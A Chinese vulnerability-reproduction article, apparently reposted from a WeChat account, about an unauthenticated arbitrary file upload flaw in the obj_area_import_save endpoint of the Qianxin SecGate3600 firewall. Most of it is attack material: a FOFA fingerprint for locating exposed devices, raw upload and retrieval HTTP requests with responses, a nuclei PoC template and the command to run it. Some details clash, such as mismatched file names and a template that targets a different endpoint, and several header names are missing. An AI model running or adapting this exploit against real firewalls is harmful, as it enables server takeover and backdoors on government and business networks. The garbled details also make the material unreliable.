01 漏洞名称
02 漏洞影响
网神SecGate3600防火墙
03 漏洞描述
网神SecGate3600防火墙是一款能够全面应对传统网络攻击和高级威胁的创新型防火墙产品,基于麒麟操作系统与飞腾硬件平台打造,可广泛运用于政府机构、各类企业和组织的业务网络边界,实现网络安全域隔离、精细化访问控制、高效的威胁防护和高级威胁检测等功能。该软件obj_area_import_save接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
04 FOFA搜索语句
fid="1Lh1LHi6yfkhiO83I59AYg=="
05 漏洞复现
第一步,向靶场发送如下数据包上传文件
POST/?g=obj_area_import_saveHTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmtUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36------WebKitFormBoundarybqvzqvmtContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundarybqvzqvmtContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"Content-Type: text/plainpxplitttsrjnyoafavcajwkvhxindhmu------WebKitFormBoundarybqvzqvmtContent-Disposition: form-data; name="submit_post"obj_app_upfile------WebKitFormBoundarybqvzqvmtContent-Disposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundarybqvzqvmt--
响应内容如下
HTTP/1.1 302 FoundExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma:no-cacheContent-Type:text/htmlDate: Tue,26Dec202310:06:22GMTSet-Cookie: __s_sessionid__=lb4dek9un1vrvf3t3a6vrns015; path=/Cache-Control:no-store,no-cache, must-revalidate, post-check=0, pre-check=0Location: /?permission_error=1Fileisvalid,andwas successfully uploaded.Array([upfile] =>Array([name] => cciytdzu.txt[type] =>text/plain[tmp_name] => /tmp/phpXvf9rN[error] =>0[size] =>32))
第二步,访问回显文件
GET/attachements/xlskxknxa.txtHTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
响应数据包如下
HTTP/1.1200OKDate: Tue, 26 Dec 2023 10:05:42 GMTContent-Type: text/plainAccept-Ranges: bytesEtag: "3338122476"Last-Modified: Tue, 26 Dec 2023 10:05:42 GMTContent-Length: 32pxplitttsrjnyoafavcajwkvhxindhmu
漏洞复现成功
06 nuclei poc
poc文件内容如下
id: qianxin-secworld-secgate3600-obj_area_import_save-fileuploadinfo:name:奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞author:fgzseverity:criticaldescription:网神SecGate3600防火墙是一款能够全面应对传统网络攻击和高级威胁的创新型防火墙产品,基于麒麟操作系统与飞腾硬件平台打造,可广泛运用于政府机构、各类企业和组织的业务网络边界,实现网络安全域隔离、精细化访问控制、高效的威胁防护和高级威胁检测等功能。该软件obj_area_import_save接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。metadata::1:fid="1Lh1LHi6yfkhiO83I59AYg=="verified:truevariables:file_name:"{{to_lower(rand_text_alpha(8))}}"file_content:"{{to_lower(rand_text_alpha(20))}}"rboundary:"{{to_lower(rand_text_alpha(26))}}"requests:raw:|+POST/?g=app_av_import_save HTTP/1.1Host:{{Hostname}}:multipart/form-data; boundary=----{{rboundary}}:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36------{{rboundary}}:form-data; name="MAX_FILE_SIZE"10000000------{{rboundary}}:form-data; name="upfile"; filename="{{file_name}}.txt":text/plain{{file_content}}------{{rboundary}}:form-data; name="submit_post"obj_app_upfile------{{rboundary}}:form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------{{rboundary}}--|GET/attachements/{{file_name}}.txt HTTP/1.1Host:{{Hostname}}:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15:gzipmatchers:type: dsldsl:"status_code_1 == 302 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
运行POC
nuclei.exe -t mypoc/奇安信/qianxin-secworld-secgate3600-obj-area-import-save-fileupload.yaml -u http://x.x.x.x
07 修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):【漏洞复现】奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论